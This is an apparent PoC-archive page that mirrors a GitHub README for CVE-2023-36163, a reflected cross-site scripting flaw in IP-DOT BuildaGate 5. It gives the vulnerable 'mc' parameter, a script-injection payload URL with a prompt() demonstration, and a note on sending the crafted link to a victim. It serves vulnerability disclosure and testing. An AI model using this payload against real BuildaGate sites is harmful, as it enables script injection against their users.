Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2023-36163 PoC — IP-DOT BuildaGate 跨站脚本漏洞

Source
https://github.com/TraiLeR2/CVE-2023-36163
Associated Vulnerability
Title:IP-DOT BuildaGate 跨站脚本漏洞 (CVE-2023-36163)
Description:IP-DOT BuildaGate是IP-DOT公司的一个应用程序。 IP-DOT BuildaGate 5 存在跨站脚本漏洞,该漏洞源于允许远程攻击者通过精心设计的脚本执行任意代码。
Description
Cross Site Scripting vulnerability in IP-DOT BuildaGate v.BuildaGate5 allows a remote attacker to execute arbitrary code via a crafted script to the mc parameter of the URL
Readme
# Exploit Title: BuildaGate5library - Reflected Cross-Site Scripting (XSS)
# Date: 06/07/2023
# Exploit Author: Idan Malihi
# Vendor Homepage: None
# Version: 5
# Tested on: Microsoft Windows 10 Pro
# CVE: CVE-2023-36163

# PoC:
An attacker needs to find the vulnerable parameter (mc=) and inject the JS code like:
'><script>prompt("XSS");</script><div id="aa

After that, the attacker must send the full URL with the JS code to the victim and inject their browser.

#Payload:
company_search_tree.php?mc=aaa'><script>prompt("XSS");</script><div id="aaaa
File Snapshot

 [4.0K]  /data/pocs/a4fea069f1accc08ea2540a096254a378e4a6cad
└── [ 554]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.